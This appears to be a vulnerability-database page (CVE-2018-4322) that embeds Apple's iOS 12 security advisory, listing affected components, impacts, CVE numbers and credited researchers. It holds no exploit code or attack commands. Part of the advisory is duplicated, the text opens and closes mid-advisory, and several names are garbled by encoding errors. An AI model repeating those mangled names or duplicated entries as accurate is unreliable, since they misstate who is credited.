Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4383: Apple
Entry added October 30, 2018
IOMobileFrameBuffer
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4335: Brandon Azad
IOUserEthernet
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4401: Apple
Entry added October 30, 2018
iTunes Store
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to leak sensitive user
information
Description: An access issue existed with privileged API calls.
CVE-2018-4399: Fabiano Anemone (@anoane)
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4407: Kevin Backhouse of Semmle Ltd.
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4337: Ian Beer of Google Project Zero
CVE-2018-4340: Mohamed Ghannam (@_simo36)
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative,
Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
mDNSOffloadUserClient
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4326: an anonymous researcher working with Trend Micro's
Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team
Entry added October 30, 2018
MediaRemote
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs
Entry added October 30, 2018
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted
messages
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: Utku Altinkaynak
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2018-4395: Patrick Wardle of Digita Security
Entry added October 30, 2018
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4325: Brian Adeloye
Symptom Framework
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Text
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to a
denial of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4304: jianan.huang (@Sevck)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan
Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4323: Ivan Fratric of Google Project Zero
CVE-2018-4328: Ivan Fratric of Google Project Zero
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
CVE-2018-4360: William Bowling (@wcbowling)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
CVE-2018-4319: John Pettitt of Google
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4197: Ivan Fratric of Google Project Zero
CVE-2018-4306: Ivan Fratric of Google Project Zero
CVE-2018-4312: Ivan Fratric of Google Project Zero
CVE-2018-4314: Ivan Fratric of Google Project Zero
CVE-2018-4315: Ivan Fratric of Google Project Zero
CVE-2018-4317: Ivan Fratric of Google Project Zero
CVE-2018-4318: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may exfiltrate image data cross-origin
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4345: an anonymous researcher
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4309: an anonymous researcher working with Trend Micro's
Zero Day Initiative
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by OSS-Fuzz
Additional recognition
APFS
We would like to acknowledge Umang Raghuvanshi for their assistance.
Assets
We would like to acknowledge Brandon Azad for their assistance.
configd
We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss
GmbH for their assistance.
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
CoreSymbolication
We would like to acknowledge Brandon Azad for their assistance.
Exchange ActiveSync
We would like to acknowledge Jesse Thompson of University of
Wisconsin-Madison for their assistance.
Feedback Assistant
We would like to acknowledge Marco Grassi (@marcograss) of KeenLab
(@keen_lab) Tencent working with Trend Micro's Zero Day Initiative
for their assistance.
Kernel
We would like to acknowledge Brandon Azad for their assistance.
Mail
We would like to acknowledge Alessandro Avagliano of Rocket Internet
SE, Gunnar Diepenbruck,
and Zbyszek A>>A3Akiewski for their assistance.
MediaRemote
We would like to acknowledge Brandon Azad for their assistance.
Quick Look
We would like to acknowledge lokihardt of Google Project Zero for
their assistance.
Safari
We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad
Galbin for their assistance.
Sandbox Profiles
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
Security
We would like to acknowledge Christoph Sinai, Daniel Dudek
(@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak)
of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of
Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson
Ding, and an anonymous researcher for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Status Bar
We would like to acknowledge Ju Zhu of Meituan and Moony Li and
Lilang Wu of Trend Micro for their assistance.
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, Tencent Keen Security Lab working with Trend Micro's
Zero Day Initiative, and Zach Malone of CA Technologies for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HbuA//
ZOEwXUyLVS3SqfEjU3MRUoTp1x+Ow+fd5co9B6v7bY+Ebc2KmSZjpPuNPjouRHmf
RbWpZ0Mc52NYm+OdYqPu/Tg94wRi6tlrYusk6GngVH4IBER4TqiFrLNSzAjXL0xP
qWv3JQcAIFNbNWpSEzDzEbuq85q4BIuP/+v2LpTc1ZWqIYt9TQHxUpyjoTXZvQhL
8L9ZM/dj8BC+m713LeC/KzveaDpaqnVJUDbgUkzRyFfFqOJt+hlaTS8yMUM3G+TX
cblL8bvFNIxtUrt4Rf2TwDRVxUZIw/aFK2APmxVZ44UAT+2o+WFxBkHRXQiZc4Lk
OaTzzkocdZu4q4MibrxELBWtW46AcGMqQKUpFZ6GR+4U2c1ICRwKnjQTn0iY7mg7
d+M+bTx8T2knwV7lSwvnHz79rysvOuCF3QCAZ4tW4PvLHWSZ0TpJho8z23PLHFQd
J3cOYPby6SM9YP6SBISX5OI8xnvr1XIAPIBnOy0ScaMFsu0Er8j1hvbF1fXiaYOJ
CSUUXR2th3jPW0g9L0j4vWGURG1h0psIN2MxTSHbmm4KXBAYngZ0wDOeJMUe8YMy
IG0UBDqKNh8lzKHcc4aYA1WyaNsqbgbngBqDATp/XyWRzd+Py/U06MVuIaV095Rv
s9WW67M1kLHy4BeutXt+xLBp9AugI+gU53uysxcnBx4=
=dGPm
-----END PGP SIGNATURE-----
| VAR-201904-1413 | CVE-2018-4322 | iOS Input validation vulnerability |
CVSS V2: 2.1 CVSS V3: 3.3 Severity: LOW |
This issue was addressed with improved entitlements. This issue affected versions prior to iOS 12. iOS Contains a flaw in input validation due to incomplete handling of entitlements.Information may be obtained. Apple iOS is prone to multiple security vulnerabilities.
Attackers can exploit these issues to gain sensitive information, bypass security mechanisms, and conduct spoofing attacks and perform unauthorized actions. Accounts is one of the user account components. An attacker could exploit this vulnerability to read persistent account identifiers. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-10-30-8 Additional information for
APPLE-SA-2018-9-24-4 iOS 12
iOS 12 addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Auto Unlock
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to access local users
AppleIDs
Description: A validation issue existed in the entitlement
verification.
CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
CFNetwork
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed.
CVE-2018-4356: an anonymous researcher
CoreText
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4347: an anonymous researcher
Entry added October 30, 2018
Crash Reporter
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4333: Brandon Azad
Grand Central Dispatch
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4426: Brandon Azad
Entry added October 30, 2018
Heimdal
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4331: Brandon Azad
CVE-2018-4332: Brandon Azad
CVE-2018-4343: Brandon Azad
Entry added October 30, 2018
iBooks
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A configuration issue was addressed with additional
restrictions.
CVE-2018-4355: evi1m0 of bilibili security team
Entry added October 30, 2018
IOHIDFamily
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation
CVE-2018-4408: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4341: Ian Beer of Google Project Zero
CVE-2018-4354: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4383: Apple
Entry added October 30, 2018
IOMobileFrameBuffer
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4335: Brandon Azad
IOUserEthernet
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4401: Apple
Entry added October 30, 2018
iTunes Store
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to leak sensitive user
information
Description: An access issue existed with privileged API calls.
CVE-2018-4399: Fabiano Anemone (@anoane)
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4407: Kevin Backhouse of Semmle Ltd.
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4337: Ian Beer of Google Project Zero
CVE-2018-4340: Mohamed Ghannam (@_simo36)
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative,
Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
mDNSOffloadUserClient
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4326: an anonymous researcher working with Trend Micro's
Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team
Entry added October 30, 2018
MediaRemote
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs
Entry added October 30, 2018
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted
messages
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: Utku Altinkaynak
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2018-4395: Patrick Wardle of Digita Security
Entry added October 30, 2018
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4325: Brian Adeloye
Symptom Framework
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Text
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to a
denial of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4304: jianan.huang (@Sevck)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan
Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4323: Ivan Fratric of Google Project Zero
CVE-2018-4328: Ivan Fratric of Google Project Zero
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
CVE-2018-4360: William Bowling (@wcbowling)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
CVE-2018-4319: John Pettitt of Google
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4197: Ivan Fratric of Google Project Zero
CVE-2018-4306: Ivan Fratric of Google Project Zero
CVE-2018-4312: Ivan Fratric of Google Project Zero
CVE-2018-4314: Ivan Fratric of Google Project Zero
CVE-2018-4315: Ivan Fratric of Google Project Zero
CVE-2018-4317: Ivan Fratric of Google Project Zero
CVE-2018-4318: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may exfiltrate image data cross-origin
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4345: an anonymous researcher
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4309: an anonymous researcher working with Trend Micro's
Zero Day Initiative
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by OSS-Fuzz
Additional recognition
APFS
We would like to acknowledge Umang Raghuvanshi for their assistance.
Assets
We would like to acknowledge Brandon Azad for their assistance.
configd
We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss
GmbH for their assistance.
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
CoreSymbolication
We would like to acknowledge Brandon Azad for their assistance.
Exchange ActiveSync
We would like to acknowledge Jesse Thompson of University of
Wisconsin-Madison for their assistance.
Feedback Assistant
We would like to acknowledge Marco Grassi (@marcograss) of KeenLab
(@keen_lab) Tencent working with Trend Micro's Zero Day Initiative
for their assistance.
Kernel
We would like to acknowledge Brandon Azad for their assistance.
Mail
We would like to acknowledge Alessandro Avagliano of Rocket Internet
SE, Gunnar Diepenbruck,
and Zbyszek A>>A3Akiewski for their assistance.
MediaRemote
We would like to acknowledge Brandon Azad for their assistance.
Quick Look
We would like to acknowledge lokihardt of Google Project Zero for
their assistance.
Safari
We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad
Galbin for their assistance.
Sandbox Profiles
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
Security
We would like to acknowledge Christoph Sinai, Daniel Dudek
(@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak)
of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of
Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson
Ding, and an anonymous researcher for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Status Bar
We would like to acknowledge Ju Zhu of Meituan and Moony Li and
Lilang Wu of Trend Micro for their assistance.
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, Tencent Keen Security Lab working with Trend Micro's
Zero Day Initiative, and Zach Malone of CA Technologies for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HbuA//
ZOEwXUyLVS3SqfEjU3MRUoTp1x+Ow+fd5co9B6v7bY+Ebc2KmSZjpPuNPjouRHmf
RbWpZ0Mc52NYm+OdYqPu/Tg94wRi6tlrYusk6GngVH4IBER4TqiFrLNSzAjXL0xP
qWv3JQcAIFNbNWpSEzDzEbuq85q4BIuP/+v2LpTc1ZWqIYt9TQHxUpyjoTXZvQhL
